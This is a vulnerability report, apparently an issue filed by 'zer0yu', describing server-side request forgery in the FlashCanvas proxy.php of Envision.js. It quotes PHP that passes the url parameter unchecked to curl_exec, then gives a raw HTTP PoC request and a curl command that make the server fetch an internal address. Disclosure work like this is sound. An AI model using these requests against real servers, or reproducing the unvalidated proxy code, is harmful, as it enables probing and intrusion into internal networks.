[Vuln] SSRF vulnerability in curl_init Function of proxy.php File (Envision.js latest version)

[zer0yu]

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: latest
Test with PHP 7.2

The vulnerable code is located in the curl_init function of the lib/FlashCanvas/bin/proxy.php file, which does not perform sufficient checksumming of the url parameter, leading to a taint introduced from the $_GET['url'] variable and eventually into the tainted function curl_init, where the curl_ exec function is executed, it sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

......
$url = str_replace($search, $replace, $_GET['url']);

// Disable compression
header('Content-Encoding: none');

// Load and output the file
if (extension_loaded('curl')) {
    // Use cURL extension
    $ch = curl_init($url);
    curl_exec($ch);
    curl_close($ch);
......

Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

GET /proxy.php?url=http://172.16.119.1/proxypoc HTTP/1.1
Host: 172.16.119.1:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Referer: #/flash123canvas.swf
Connection: close

You can also use the following curl command to verify the vulnerability

curl -i -s -k -X $'GET' \
    -H $'Host: 172.16.119.1:81' -H $'Referer: #/flash123canvas.swf' -H $'Connection: close' \
    $'http://172.16.119.1:81/proxy.php?url=http://172.16.119.1/proxypoc'